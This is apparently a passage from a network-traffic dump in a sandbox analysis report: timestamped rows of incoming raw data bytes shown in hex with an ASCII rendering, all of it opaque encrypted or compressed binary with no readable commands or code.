2023-09-07 07:31:08 UTC	254	IN	Data Raw: 68 42 80 69 52 b7 71 f3 7d 83 5f a0 4b 38 21 57 71 01 9b 6b cc cc e9 8c 6e 33 62 01 ea b3 81 f9 1e aa 5c 46 d0 2f 34 1e da 18 be 61 a1 d8 f1 ad 14 33 e7 37 ae ba 4f 20 79 c6 3d 8a e1 dc 43 f7 33 61 63 12 47 7f 39 b7 5a 01 53 85 5a 1c b1 65 cd 34 2d 6b 33 8a c0 70 26 93 13 5c 2b c4 9f f7 98 25 2d 25 62 70 00 b0 ed cf 99 8f ea f2 9d 8e 1b 5b 52 6f 77 c3 93 2d 34 a0 b0 ca 27 61 fe 31 a5 5d 1b a6 3e 62 6d bf 6a 9e 5a 73 38 60 92 99 f4 72 14 35 14 5e d1 15 88 35 58 b5 4e 25 da 3d 82 a7 31 ef ff 39 34 32 03 65 6c b7 26 56 cd 5b 54 83 b9 00 85 52 0e 42 ec 7a b5 48 1e d3 f1 9a 43 e3 b2 69 b6 51 44 3a cf b3 10 1b 8d d7 fd c7 96 f2 f6 2e 99 61 c3 d6 07 ae a7 01 4e 5e 87 ed ee 99 6d ef 35 c5 0d f5 af eb 96 23 f2 3f bf 9a e4 18 c5 50 12 39 07 0c 03 e6 a7 56 3a 86 0c Data Ascii: hBiRq}_K8!Wqkn3b\F/4a37O y=C3acG9ZSZe4-k3p&\+%-%bp[Row-4'a1]>bmjZs8`r5^5XN%=1942el&V[TRBzHCiQD:.aN^m5#?P9V:
2023-09-07 07:31:08 UTC	255	IN	Data Raw: c7 95 92 7a ae 87 03 e5 99 8a b0 35 e7 74 08 d8 8e 71 d0 b5 14 cd d3 3f 03 a8 11 d9 14 86 04 e9 2a 45 51 43 13 52 71 d9 ca f0 15 ba b3 17 6c 30 98 07 c9 bf f4 46 58 bf be 71 e0 39 da 22 5a d4 91 f0 43 f4 c0 5c a6 91 11 92 11 43 c9 d6 bf 33 7a 37 d6 45 ef f4 87 81 db d9 cb 94 bd 09 bd 2a 69 04 4e 2b a2 c4 62 e0 68 8e 09 65 d9 3c c6 2b dd c0 8e 75 f1 f5 b7 98 ef c4 3a 21 8a 89 d5 c0 da ae 61 ef fd 4b 92 4b 6a ba 62 30 59 87 86 f5 59 9b 41 1f fb 4d 00 ae 77 4c 96 49 75 44 fc 13 03 fe f7 fa 03 64 c1 3a a1 7b 0b 05 01 f1 59 1c 2d 2f 7d f6 2e 63 0b ce 8c 18 de 94 8c e2 8c 84 c1 2e e9 25 0d da 63 f8 76 08 e0 aa ca 88 0a 43 88 3d d5 81 3a 48 91 cb 0e 52 ae f6 d8 86 5a ee 57 eb 84 23 1d a4 22 51 8c 5f 8c 4b 11 b1 35 2e 0f a6 5a 00 82 0f 52 3b b9 e1 39 66 00 a0 6a Data Ascii: z5tq?EQCRql0FXq9"ZC\C3z7EiN+bhe<+u:!aKKjb0YYAMwLIuDd:{Y-/}.c.%cvC=:HRZW#"Q_K5.ZR;9fj
2023-09-07 07:31:08 UTC	256	IN	Data Raw: c5 fb 5f fa 55 6c 71 17 d5 74 ab 0f 37 9d 74 17 c4 90 bc d8 73 4a 4b ae 41 d1 1b 34 b0 ef 29 8f 53 ad 54 59 a6 a4 a1 50 d6 2a 00 7b fc 0e bf 7e 3c aa 88 53 06 49 9d 24 94 f1 01 ae d9 09 16 a9 f2 84 38 ad c9 f3 e5 9f ff 99 48 e3 1c 80 67 e4 55 95 3a 32 7a d7 97 d4 11 97 c8 3f fe 25 4a cf 4e ae 77 da 5a 5f ae ac 76 d2 15 d8 01 c3 16 55 e6 26 17 11 a6 d4 bd 92 d0 23 4e 83 73 7e 3e f6 65 a8 27 e7 7b ac d6 ab 7d 2f 7f 48 59 a0 73 2b f9 90 b9 2a 54 13 d6 d4 d1 dc 4d 8c 85 34 50 13 a2 a8 99 db 49 59 46 45 d8 db 54 8c 3a f2 03 39 5d 94 5f 7e dd 4a 7a bd 86 3b ec 00 ab fc a7 3a cb c7 cd f9 ad dd bb 04 ae 15 c2 33 c1 be fe ff 18 bc 94 42 61 8f 97 b0 d0 c7 59 12 e6 34 f6 37 c3 03 e0 30 4e 76 0c ec c0 72 f4 63 cd ef 46 56 12 48 83 27 79 ad a6 10 8c e8 e8 bc 70 69 4f Data Ascii: _Ulqt7tsJKA4)STYP{~<SI$8HgU:2z?%JNwZ_vU&#Ns~>e'{}/HYs+TM4PIYFET:9]_~Jz;:3BaY470NvrcFVH'ypiO
2023-09-07 07:31:08 UTC	257	IN	Data Raw: d4 63 3d ee 34 69 c6 2c 8f be 0c 86 8b a3 04 67 f9 c6 f7 75 6a 46 c8 ae b8 92 cb 81 84 d4 d1 a0 1f 66 cb ae 01 6c 08 a1 3a f8 2c eb fb 43 94 ee c5 cd f0 bc c8 ae 92 ab 96 99 03 f6 19 7c 04 90 31 88 8e 5f 43 79 79 3a 63 eb f6 d5 e4 1d 9d 41 09 86 9c 07 54 80 03 03 7c 2b 1c 02 70 3c 19 9e 0c 02 03 1f 98 0f 98 f5 11 2c 94 fd Data Ascii: c=4i,gujFfl:,C\|1_Cyy:cAT\|+p<,
2023-09-07 07:31:08 UTC	258	IN	Data Raw: 9e 57 b6 8d c7 41 55 ab 4d b1 3c c6 a6 86 cf b0 ab 5b 66 22 1e 2c 5d b2 e3 94 a3 62 ea 70 dc da f4 de e2 ac 96 57 db 48 71 a0 74 7e 6d 73 0d ac 44 6c c7 a8 72 10 20 f4 02 73 07 d4 9b eb 9c bb 71 e6 97 7f 97 7c 4d b4 26 99 e2 7b ba 4c f7 f8 c7 f7 3e 40 34 0b 5d cc 6b d2 9d 99 0b 47 91 75 50 37 9c 1c 3a 5b 3c b1 d0 a6 0b 52 eb e5 9d c6 b7 1d c0 c5 f7 ee 1d 54 cf 91 ea c2 f9 bc 3d 8d 99 ad 05 65 8c 26 48 40 4f 0c 90 06 e7 3e ac db 00 6d b0 e8 fc 42 0a 51 a0 7e a1 c4 aa 94 9f 55 27 f8 af f4 d1 6d 77 f1 ce 22 7e f3 c5 06 7a 4f dd be 45 a7 f6 c4 c2 81 22 db 00 de 51 19 b2 84 06 60 d2 f1 51 15 33 0a c8 34 f8 a4 62 eb 5c 1c 30 96 01 5c e9 d6 21 52 0e 33 f3 6d 3c a2 ba 9b 83 1e f3 c1 f6 90 64 78 ba c5 04 a0 e5 4a 8c 8e a9 6b 35 54 f0 c8 9d 8b e8 3b 90 43 27 8c 4a Data Ascii: WAUM<[f",]bpWHqt~msDlr sq\|M&{L>@4]kGuP7:[<RT=e&H@O>mBQ~U'mw"~zOE"Q`Q34b\0\!R3m<dxJk5T;C'J
2023-09-07 07:31:08 UTC	259	IN	Data Raw: bb 60 e7 30 ef cd 3a e6 a4 fd bd 05 f7 9a e9 91 9e 83 ce 75 21 3a 7b 28 3b 34 01 7c 56 80 90 53 7a 77 b9 72 05 21 9a 42 24 63 04 69 dc 9c 0c 53 2e f6 38 80 40 40 05 d5 2b 1b c4 08 a8 c9 52 13 4d f3 e5 16 17 e6 aa a1 53 25 35 d5 d8 a5 6a 2a 07 a0 e6 f7 42 da 3d 55 bc c7 26 b7 52 50 f4 4c 29 48 d0 af 6d 35 a8 fe 0b 3c 73 4f 6b 7f 97 18 83 dc 75 96 f3 70 06 e8 f9 28 76 16 9f 31 bf d6 52 40 52 ae ac 73 ce ac 74 02 0f 55 ad 27 f9 7b b1 95 b2 11 c0 5a 5d a6 f4 8e 2e e5 83 ea 02 3a 7b 19 18 00 12 53 5d a2 35 eb 0c 02 00 b8 8a a4 36 7d bf b5 1c 0f 1d 1c b3 96 3f fa ab e3 c2 21 b4 3f eb c1 0c 00 61 f1 d9 5e 62 a3 ba 33 c9 4a 38 af 01 45 a2 1e a4 68 90 1d 28 53 2e 92 74 41 e9 e3 c6 77 3a fd 37 18 28 ab e3 c2 91 4b e9 39 53 f0 3e f3 f9 f4 23 fb 18 86 46 08 0a 15 c6 Data Ascii: `0:u!:{(;4\|VSzwr!B$ciS.8@@+RMS%5j*B=U&RPL)Hm5<sOkup(v1R@RstU'{Z].:{S]56}?!?a^b3J8Eh(S.tAw:7(K9S>#F
2023-09-07 07:31:08 UTC	260	IN	Data Raw: 28 8b 0a 41 89 9f 00 8d b3 6a f1 17 9c 5e df 44 aa e5 a1 b3 90 dc 1b 8f 2d 11 69 68 8f ee e2 e5 0b 6e 01 1d ff 77 c8 a2 31 f2 88 fa 3b c5 4a 85 40 05 0e 49 f5 ee 18 d3 4f 67 b0 c4 98 1b c2 6e 00 01 bc 13 d2 bc 9c f6 a6 a2 c6 53 bb dc ac 61 bb c1 4e 81 2c e9 d2 8f d2 57 3f 94 c7 4e ec b8 ca 19 60 13 79 f8 d2 c1 83 ad ff 54 0c 12 66 6b 0b 2f 62 6a fa 86 ad 8b 96 1e 6c c9 d5 7d 4f 2e c6 bc 01 d5 44 80 e4 42 df bf 92 5b 8b 43 a5 97 d9 bd 6d 82 ea 50 6b d1 f5 83 2e f1 69 e8 a7 50 50 07 da 26 9c 86 ce 0b 1e e4 cb d6 e2 b8 93 53 f8 74 cd 40 4a a6 46 e4 64 8f f1 a6 0d a7 4a ac e0 f1 f1 81 5d de 4d 8d 57 8c bb de 2e 6e ef ff 6b f5 fd dc 88 ef 09 ca 78 bc 3c 32 e6 73 58 e5 ac 7c 87 f6 f0 c4 92 0b d4 18 f2 11 4e 36 69 c7 12 1d bf 81 fa c5 3a b4 f3 e4 f8 e8 e2 3b 58 Data Ascii: (Aj^D-ihnw1;J@IOgnSaN,W?N`yTfk/bjl}O.DB[CmPk.iPP&St@JFdJ]MW.nkx<2sX\|N6i:;X
2023-09-07 07:31:08 UTC	261	IN	Data Raw: 1c 91 00 be 28 78 6d 8b 41 6a fc 14 76 78 b0 3b f0 99 f7 29 61 9c 2f 44 fb 20 2c ce ec 5a 11 d4 1c 68 fb 10 d3 bd ae bc ec ad 8e 26 35 10 15 ba b4 e8 93 cf 67 f8 36 40 0b b9 a7 40 41 91 e0 08 ec ec a5 d7 92 f3 bc f4 c0 5c 59 91 11 8d 11 bc 31 d6 40 33 7a 37 29 45 ef f4 f0 81 db c6 34 6b 45 09 bd 2a 69 04 4e 2b a2 c4 62 e0 68 91 f6 9a 21 3c c6 2b dd c0 8e 75 f1 f5 b7 98 ef db c5 de 72 89 d5 c0 da ae 61 ef fd 4b 92 4b 6a a5 9d cf a1 87 86 f5 59 9b 41 1f fb 4d 00 ae 77 53 69 b9 75 44 fc 13 03 fe f7 fa 03 64 c1 3a a1 64 f4 f5 01 f1 59 1c 2d 2f 7d f6 2e 63 0b ce 8c 07 21 64 8c e2 8c 84 c1 2e e9 25 0d da 63 f8 76 17 10 5a ca 88 e5 43 88 3d 2a 81 3a 48 6e cb 0e 4d ae 06 d8 86 a5 cd 74 c8 7b c9 f7 4e dd ae 73 bf 8c 44 ee 4e ca d1 f0 59 a5 ff 7d f0 ad c4 46 01 39 Data Ascii: (xmAjvx;)a/D ,Zh&5g6@@A\Y1@3z7)E4kEiN+bh!<+uraKKjYAMwSiuDd:dY-/}.c!d.%cvZC=:HnMt{NsDNY}F9
2023-09-07 07:31:08 UTC	262	IN	Data Raw: 90 9b e7 ba c5 fb 3f e5 4a 73 11 a9 6b ca cb f0 c8 62 14 e8 3b 6f dc 27 8c b5 2b 51 be 2e 7b cb 4f 10 5d 70 ac 52 f7 a6 59 5b 7b af 29 d5 ff 84 03 f1 40 81 c3 55 77 ac f9 b6 62 db 6b 0e fe 51 26 f6 e9 56 0d 7b c7 52 36 0c 1a 60 00 66 b7 1c e3 7f 98 1b aa 6a c5 cd 85 28 68 2b ee 68 37 c0 01 da b5 30 b1 51 88 25 a5 a0 51 53 89 2d ea 27 fe 3c e9 aa 19 d9 e8 ee 59 2b 42 6d 2f dc b1 7c 8c 81 c1 09 9a 57 d8 18 84 53 29 54 82 d0 80 b7 a6 5f 8c d4 06 6f 46 d5 ab ec 29 2b 2e 23 b2 73 7a cb af ec 5d 57 66 24 b6 a6 b9 ba 27 24 ab 73 c5 0d ff c6 a2 6b e5 81 22 b5 30 42 79 c4 e2 ff 54 03 a6 c5 34 38 cc 06 52 22 bb fb 51 ea c2 cc 3e 41 ff 00 e7 43 94 bd 9e 70 97 4f 2f 38 58 ed 19 cb f6 c8 3c fc e0 cf b1 89 0d 13 3f 8d f4 9c 32 10 46 a9 ed b7 83 d8 86 52 a7 ef 73 17 e8 Data Ascii: ?Jskb;o'+Q.{O]pRY[{)@UwbkQ&V{R6`fj(h+h70Q%QS-'<Y+Bm/\|WS)T_oF)+.#sz]Wf$'$sk"0ByT48R"Q>ACpO/8X<?2FRs
2023-09-07 07:31:08 UTC	264	IN	Data Raw: fd c8 18 28 ab 1c c2 91 4b 16 39 53 f0 c1 f3 f9 f4 dc fb 18 86 b9 08 0a 15 39 37 d1 c7 ed 34 fe fb ab 2e df 60 19 34 d1 7e 13 f7 de 45 87 d3 94 84 3c 6b 91 ba b2 0f c3 b7 d1 6d d4 e9 e6 fc 89 66 03 d9 ef 4e f7 a9 20 3c 06 78 45 1c 94 f6 aa 9b 62 9d 3e 76 f9 9d 63 31 e5 03 33 4e 1e 1c 82 f3 bb 18 5e b0 b5 03 df 24 b8 98 35 ad 9b 95 3d 22 e0 b6 4d 7b f6 55 6b f1 06 3d 06 1a 31 cf 70 17 ec 6a e2 a2 9b 98 72 5f 23 5c a2 56 c7 23 1a 48 69 1d 6c 2a e0 25 88 cd 17 8b be d1 c4 f2 6c f8 db 39 68 ce a7 df 34 be c4 f8 14 27 5c 62 7b cd 51 68 bf 2b cb b2 74 9a 2e 1c bb 06 fb 08 38 7b 40 c1 80 88 bc a3 0c d7 65 62 59 b7 f0 6e b5 ec 80 62 dc 86 ec c3 71 6c 11 f4 92 57 52 63 06 0b aa 3f 05 4b 59 e2 94 73 26 14 02 45 0b c2 4d 25 1a fb a5 30 91 b7 80 f3 bb 6f c6 5b 89 52 Data Ascii: (K9S974.`4~E<kmfN <xEb>vc13N^$5="M{Uk=1pjr_#\V#Hil*%l9h4'\b{Qh+t.8{@ebYnbqlWRc?KYs&EM%0o[R
2023-09-07 07:31:08 UTC	265	IN	Data Raw: a5 4e f4 31 fa 2f ee aa d7 b4 39 f6 00 9d 81 e0 27 e7 4b 17 05 25 16 07 d9 85 4d 3e b9 2e 9b cf 8e 20 cc 90 4b 34 95 dc b6 4e 3b ea 2b 40 f6 8c 6f ec c9 d4 aa d0 aa fb ee e6 44 42 d3 c3 f7 de 2b 76 0b 5c d2 42 5a 5e 26 dc e7 a3 83 b9 99 f2 10 37 19 4d e5 ce 88 57 c9 44 c9 5d f3 d4 fe a3 7a 1e c7 d4 53 cb f9 c5 e9 59 a6 d9 46 41 f1 75 59 bd e7 d5 0d 10 3a 02 45 20 bc e0 15 47 e9 74 7c 5e ce 91 c0 e7 7a cd d9 e9 01 98 b7 5d 91 b6 98 aa b9 97 e7 fc 9a a6 c5 be 05 8c 3e 41 0c b6 cc 2b 38 64 a1 9d 04 30 c9 c6 c4 ed 4a 14 52 f7 ac 2e e4 f3 f5 3b aa 44 b1 f8 35 31 39 78 6b cf e5 7d e6 12 a0 07 3d b1 5d 1a 27 52 b0 8d f4 a9 cb 95 d0 4b 8c e9 a9 1c d4 e5 73 ae b5 a7 97 f9 5e 04 74 77 2d a8 06 08 25 ff 76 93 1c b1 be d6 52 40 52 ae ac 73 ce ac 74 02 0e 55 ad 27 da Data Ascii: N1/9'K%M>. K4N;+@oDB+v\BZ^&7MWD]zSYFAuY:E Gt\|^z]>A+8d0JR.;D519xk}=]'RKs^tw-%vR@RstU'
2023-09-07 07:31:08 UTC	266	IN	Data Raw: 37 84 36 08 b1 22 51 8d 5e 8d 4a 11 b1 35 2e 0f a6 5a 00 83 0e 53 3a b9 e1 39 66 00 a0 6a 11 21 12 0a 12 19 00 ee 88 53 e6 7d 92 eb be 2a 1e 56 fa 5d 1c 7b fd 81 ba 0f 58 ef 65 73 7c e2 f2 36 50 71 24 62 15 be 9d b3 bf fa 19 04 9f a4 7a b2 f7 b6 7b c2 01 f0 66 cf 55 13 a2 9c f9 c8 9c 7e bb 9a b5 8d b0 19 87 f1 33 ba d0 f7 ab 87 1f 54 d6 75 8b be 76 60 80 72 4c 95 71 ea 61 a3 5e ac 4f 07 21 55 73 03 9b 6a ce ce e8 b1 59 3d 62 f2 1c 79 81 1d ff 77 5d a2 31 f2 34 fa 3b c5 9d 85 40 05 0a 49 f5 ee 18 d3 4f 67 b0 c4 98 1b c2 6e 00 01 bc 13 d2 bc 9c f6 a6 a2 c6 53 bb dc ac 61 bb c1 4e 81 2c e9 d2 8f d2 57 3f 94 c7 4e ec b8 ca 19 60 13 79 f8 d2 c1 83 ad ff 54 0c 12 66 6b 0b 2f 62 6a fa 86 ad 8b 96 1e 6c c9 d5 7d 57 2e c6 bc ea d5 44 80 1b 42 df bf 6c 6c bd 75 5a Data Ascii: 76"Q^J5.ZS:9fj!S}*V]{Xes\|6Pq$bz{fU~3Tuv`rLqa^O!UsjY=byw]14;@IOgnSaN,W?N`yTfk/bjl}W.DBlluZ
2023-09-07 07:31:08 UTC	267	IN	Data Raw: 02 e1 31 4e 76 0c ec c0 72 f4 63 cc ee 47 57 12 48 83 27 79 ad a6 10 8d e9 e9 bd 79 62 43 0a 21 3c 45 21 b6 e1 e5 45 e0 e3 13 3c ca 86 9b 42 87 d5 33 82 56 25 96 49 eb 47 b4 83 aa 4a 62 3a 79 63 5e b8 1d e1 8a b8 1a 80 5f 6c a6 26 8a fa 67 20 92 53 96 70 c2 4c 53 53 35 82 bc a3 65 cf 4a 52 a1 3d 9e 7b 8a 77 f3 91 79 f0 55 19 ef 22 46 e4 91 00 be 28 78 6d 8b 41 6a fc 14 76 67 4f c4 08 99 f7 29 61 9c 2f 44 fb 20 33 ce ec 45 00 2b e4 68 05 10 d3 bd 50 f5 a4 ea 70 cd dc e9 14 ae a5 0e 6d 24 8e 1e c8 b6 fe 4a 59 be bf 70 e1 09 ea 12 5b 29 6c 0d 42 0a 3e a2 a7 6f ef 6c 10 bd 37 28 be cd 84 c9 d7 bb 11 0a 0e 7f 25 27 35 6a 43 f7 43 d4 97 fa b0 d5 5c 3a 9c 1e 96 70 f7 9b 27 c2 38 d5 23 3e 70 8b 0f 0b 49 66 11 3a c4 df 74 77 2b 3e 24 50 9f 11 03 b5 6c b5 94 44 9c Data Ascii: 1NvrcGWH'yybC!<E!E<B3V%IGJb:yc^_l&g SpLSS5eJR={wyU"F(xmAjvgO)a/D 3E+hPpm$JYp[)lB>ol7(%'5jCC\:p'8#>pIf:tw+>$PlD
2023-09-07 07:31:08 UTC	269	IN	Data Raw: ee 1d 54 cf 91 ea c2 f9 bc 3d 8d 99 ad 05 65 8c 26 48 40 4f 0c 90 06 e7 3e ac db 00 6d b0 e8 fc 42 0a 51 a0 7e a1 db aa 94 9f bb 27 f8 af 0a d1 6d 4c 0f 84 6b d1 0d 2b eb 6f b1 33 53 50 59 18 29 d7 7f d5 2c 0a 20 af e7 b3 7a f8 9e d3 0f af eb 32 f4 36 ca f9 5a 9c 15 5d e2 ce 68 00 a2 17 28 20 ac f0 cd f2 93 c2 5c bb 65 7d e0 f2 3f 08 6e 65 86 44 3b 05 5e 1b b4 8d 70 57 95 34 aa 0e 36 9c 75 16 c5 91 bd d9 72 4b 4a af 40 d0 1a 35 b1 ee 28 8e 52 ac 55 58 a7 a5 a0 51 d7 2b 01 7a fd 0f be 7f 3d ab 89 52 07 48 9c 25 95 f0 00 af d8 08 17 a8 f3 85 39 ac c8 f2 e4 9e fe 98 49 e2 1d 81 66 e5 54 94 3b 33 7b d6 96 d5 10 96 c9 3e ff 24 4b ce 4f af 76 db 5b 5e af ad 77 d3 14 d9 00 c2 17 54 e7 27 16 10 a7 d5 bc 93 d1 22 4f 82 72 7f 3f f7 64 a9 26 e6 7a ad d7 aa 7c 2e 7e Data Ascii: T=e&H@O>mBQ~'mLk+o3SPY), z26Z]h( \e}?neD;^pW46urKJ@5(RUXQ+z=RH%9IfT;3{>$KOv[^wT'"Or?d&z\|.~
2023-09-07 07:31:08 UTC	270	IN	Data Raw: fc 0c 16 cf 0d 64 e8 ad 10 ad 28 d6 39 59 50 5d 83 cc 52 8a fc 0e ab 53 d9 f8 85 4f 6b b3 ef 3e a4 5c 58 0a 70 2f 1b 7d 14 03 c4 85 e7 19 fe ec ad 5c 5c cb 15 0d fc fe 46 8b 5a c8 83 be 4b e2 f1 1c e2 4d 68 3e 04 55 1d c3 df 4a c1 ea 3f f2 fe 60 0f 27 a0 63 5d 44 cd c8 b4 c6 51 00 bb 5c e0 a5 96 6e e3 29 ad d0 6c 75 bf 17 1d c7 89 c4 03 36 e6 d6 55 e2 3c 6f b5 e8 c7 ad 0e 3f 0d 07 0a 22 05 e6 78 47 f6 f4 eb c7 c9 2f 39 13 ca 00 05 55 d0 21 9e e7 ca 36 98 ef 09 b4 1b 75 2d b9 9f d0 95 fc db 40 f1 26 54 2d 93 2a 17 18 02 77 98 fd 05 11 b0 09 8f e2 81 ff 78 7c 34 7a f7 07 3d 95 9c c0 88 07 9d 86 d5 01 02 aa d5 82 1d e3 91 dd 18 67 f4 f5 02 ee 68 e1 99 04 e1 c2 95 0c 6e b9 b7 c6 8d 08 54 ab 4d b1 3d c6 a6 86 ce b0 ab 5b 7b 22 1e 2c 79 b2 e3 94 a3 62 ea 70 dc Data Ascii: d(9YP]RSOk>\Xp/}\\FZKMh>UJ?`'c]DQ\n)lu6U<o?"xG/9U!6u-@&T-*wx\|4z=ghnTM=[{",ybp
2023-09-07 07:31:08 UTC	271	IN	Data Raw: 78 53 75 68 e0 92 37 2b 83 b1 d0 38 42 ff 2b ba 7e 1a bc 21 41 6c a5 75 bd 5b 69 27 43 93 83 eb 51 15 2f 0b 7d d0 0f c6 40 50 af 9b da c8 27 54 5c 23 f5 d7 20 31 28 3f 62 68 ad 5b 18 c4 41 e1 18 b6 1a 4b 92 1c 58 21 bd a6 52 93 6e fc 80 70 f0 b7 73 a9 72 45 20 d0 90 11 01 92 f4 fc dd 89 d1 f7 34 86 42 c2 cc 18 8d a6 1b 51 7d 86 f7 f5 bd 6a f5 20 eb 03 ef ba c5 98 39 e7 11 b1 80 4e 8e 70 4a f3 e4 f8 16 e2 3b 58 4c db 5b f3 8a 2b 6f fd 2d 75 a9 e9 6a 39 54 93 c4 0f c9 9d 09 68 8e 31 37 31 48 0d 55 1e 0c 3b bb a6 32 1e 09 3b c9 ab f4 b9 30 9f a5 ba c7 01 19 46 61 64 66 17 f2 ea e6 a9 04 13 76 b2 2b 99 36 b8 11 09 01 47 9b c3 39 31 b1 16 06 20 0b 84 59 3d a7 9c 10 90 bb 60 f7 30 ef cd 3a e6 a4 fd bc 49 bc d1 e9 64 6d 71 cf 80 d5 c8 7b dd cf c6 01 86 af 79 91 Data Ascii: xSuh7+8B+~!Alu[i'CQ/}@P'T\# 1(?bh[AKX!RnpsrE 4BQ}j 9NpJ;XL[+o-uj9Th171HU;2;0Fadfv+6G91 Y=`0:Idmq{y
2023-09-07 07:31:08 UTC	272	IN	Data Raw: 3e 70 8b 0f 0b 49 66 11 3a c4 df 71 73 2c 3e 2c 5b 92 11 0b be 61 b5 9c 4f 91 ce 15 cb cd 0b 59 9b 41 e1 fb 4d 00 50 77 4c 96 a7 75 44 fc 0c 03 fe f7 fa 03 64 c1 3a a1 7b 0b 05 01 f1 59 1c 2d 2f 7d f6 2e 63 0b ce 8c 18 de 94 8c e2 8c 84 c1 2e e9 25 0d da 63 f8 76 08 ef aa ca 88 e5 43 88 3d 2a 81 3a 48 6e cb 0e 52 51 f6 d8 86 a5 cd 74 c8 7b c9 f7 4e dd ae 73 a0 73 ab ee 4e ca 3e f0 59 a5 00 7d f0 ad 3a 0a 52 8a 66 09 a9 61 10 28 1a 01 13 11 09 e4 88 56 e3 79 92 eb be 2a 1e 56 fa 5d 1c 7b fd 81 ba 0f 58 ef 65 73 7c e2 f2 36 50 71 24 62 15 be 9d b3 bf fa 19 04 9f a4 7a b2 f7 b6 7b c2 01 f0 66 cf 55 13 a2 92 f6 ca 9c 5f 9f 99 b5 8f b2 19 86 f5 36 bb d1 8c 2e 8c 1f 87 33 66 8a 7e a6 71 81 48 73 93 71 cd 4b a5 5f 93 79 1e 20 64 44 27 9b 5f e1 ea e9 a2 4a 14 63 Data Ascii: >pIf:qs,>,[aOYAMPwLuDd:{Y-/}.c.%cvC=:HnRQt{NssN>Y}:Rfa(VyV]{Xes\|6Pq$bz{fU_6.3f~qHsqK_y dD'_Jc
2023-09-07 07:31:08 UTC	273	IN	Data Raw: d9 e8 ee 59 2b 42 6d 2f dc b1 7c 8c 81 c1 09 9a 57 d8 18 84 53 29 4b 82 d0 80 58 a6 5f 8c 2b 06 6f 46 2b e6 a1 65 d4 d6 d4 44 8d 83 33 58 13 a4 af 91 db 4a 5d 42 44 d8 db 54 8c 3a f2 03 39 5c 95 5e 7f dd 4a 7a bd 86 3b ec 00 aa fd a6 3b cb c7 cd f9 ad dd bb 04 af 14 c3 32 c1 be fe ff 18 bc 94 42 60 8e 96 b1 d0 c7 59 12 e6 Data Ascii: Y+Bm/\|WS)KX_+oF+eD3XJ]BDT:9\^Jz;;2B`Y
2023-09-07 07:31:08 UTC	274	IN	Data Raw: 34 f6 37 c3 03 e0 30 4f 77 0d ed c0 72 f4 63 cd ef 46 56 10 4a 82 26 0b d1 ac 10 5e 0c fa bc b6 be 5e 0b 0f 6b 5b 21 a3 f9 fe 44 f4 f5 09 3d 7d 31 22 42 78 2a cc 83 a8 db 68 48 14 b8 4b 93 55 b5 9d da 87 9d a0 46 e2 1e 75 47 e5 7f a0 93 58 d8 74 04 98 df 6d ac 69 8f 3d b3 be b8 c8 7c f9 96 8a 30 7b 72 4c c3 4e b7 70 88 0c 6e 86 0f ab e7 11 dc b9 1b 6e ff 41 d7 87 92 75 bf 94 02 eb 89 98 b0 3b f7 66 08 d7 9f 62 d1 bb 04 df d3 31 13 ba 11 d5 1a 96 05 ef 2c 42 51 43 13 52 71 d8 cb f1 14 ba b3 17 6c 30 98 07 c9 be f5 47 59 bf be 71 e0 08 eb 13 5a 29 6c 0d 42 08 3b a7 a6 68 e9 65 11 bb 3e 20 be ca 82 c0 d6 08 a2 b8 0f 81 db d9 35 94 bd 09 42 2a 69 04 a1 2b a2 c4 7d e0 68 8e 09 65 d9 3c c6 2b dd c0 8e 75 f1 f5 b7 98 ef c4 3a 21 8a 89 d5 c0 da ae 61 ef fd 4b 92 Data Ascii: 470OwrcFVJ&^^k[!D=}1"BxhHKUFuGXtmi=\|0{rLNpnnAu;fb1,BQCRql0GYqZ)lB;he> 5Bi+}he<+u:!aK
2023-09-07 07:31:08 UTC	275	IN	Data Raw: e3 3e 3b 09 10 e3 aa 31 6f 14 3c 07 42 c3 73 67 53 fb 9b 72 d8 b6 be b1 f2 6e f8 19 c0 52 25 fe 93 4e 16 02 bc f4 af 5e 80 5f 3a 54 6a 61 ab d9 06 51 0a 2f 93 b2 0f 30 dc 67 0d 3b f8 7b b1 23 40 44 59 08 3a c3 7f dc 25 01 20 af e7 b3 7a f8 9e d3 0f af eb 32 f4 34 c8 fb 5a 9b 12 5b e2 c9 6f 06 a2 10 2f 26 ac 43 7e 41 93 3c a2 45 65 83 1e 0c 3f f6 90 9b 96 ba c5 fb bf e5 4a 73 8e a9 6b ca 54 f0 c8 62 8b e8 3b 6f 43 27 8c b5 b4 51 be 2e e4 cb 4f 10 d6 70 ac 52 ab a6 59 5b 5e af 29 d5 ff 84 03 f1 40 81 c3 55 77 ac f9 b6 62 db 6b 0e fe 51 26 f6 e9 56 0d 7b c7 52 36 0c 1a 60 00 66 b7 1c e3 7f 87 1b aa 6a 2a cd 85 28 97 2b ee 68 c9 8d 4c 97 4a ca 48 a8 76 df 5f 59 ae a9 73 d4 15 da 02 c0 17 55 e6 26 17 11 a6 d4 bd 93 d1 22 4f 83 73 7e 3e f6 65 a8 27 e6 7a ad d7 Data Ascii: >;1o<BsgSrnR%N^_:TjaQ/0g;{#@DY:% z24Z[o/&C~A<Ee?JskTb;oC'Q.OpRY[^)@UwbkQ&V{R6`fj*(+hLJHv_YsU&"Os~>e'z
2023-09-07 07:31:08 UTC	276	IN	Data Raw: 26 73 68 be 3d b4 16 f9 28 89 e8 9f 31 40 28 52 40 ad 40 ac 73 31 b3 74 02 f0 55 ad 27 06 7b b1 95 4d 11 c0 5a a2 a6 f4 8e d1 e5 83 ea fd 3a 7b 19 e7 00 12 53 a2 a2 35 eb f3 02 00 b8 75 a4 36 7d 40 b5 1c 0f e2 1c b3 96 c0 fa ab e3 3d 21 b4 3f 14 c1 0c 00 9e f1 d9 5e 9d a3 ba 33 36 4a 38 af fe 5a a2 1e 5b 87 90 1d d7 ac 2e 92 8b bf a7 ae 74 88 c1 07 32 e6 d3 50 e6 3d 6a b0 ec c6 ae 0d 3c 0d 06 0b 23 04 e7 79 46 f7 f4 eb c7 c9 2e 38 12 cb 01 04 54 d1 21 9e e7 ca 2e 81 ec 08 21 ba 78 2c 6a 7a c2 95 6e 45 4d f0 3c 48 2e 92 2a 17 18 02 76 99 fc 04 10 b1 08 8e df c3 f9 79 bb e2 6a f7 55 64 9d 9d c1 89 06 9c 86 d5 01 02 ab d4 83 1c e2 90 dc 19 60 f2 fc 02 e0 67 f0 98 0a ee d3 94 03 60 a9 b7 52 1b bd 55 e3 75 5e 3c ea bc 6a ce df c8 a9 6a da e9 d2 99 4c 1d 6a 5d Data Ascii: &sh=(1@(R@@s1tU'{MZ:{S5u6}@=!?^36J8Z[.t2P=j<#yF.8T!.!x,jznEM<H.*vyjUd`g`RUu^<jjLj]
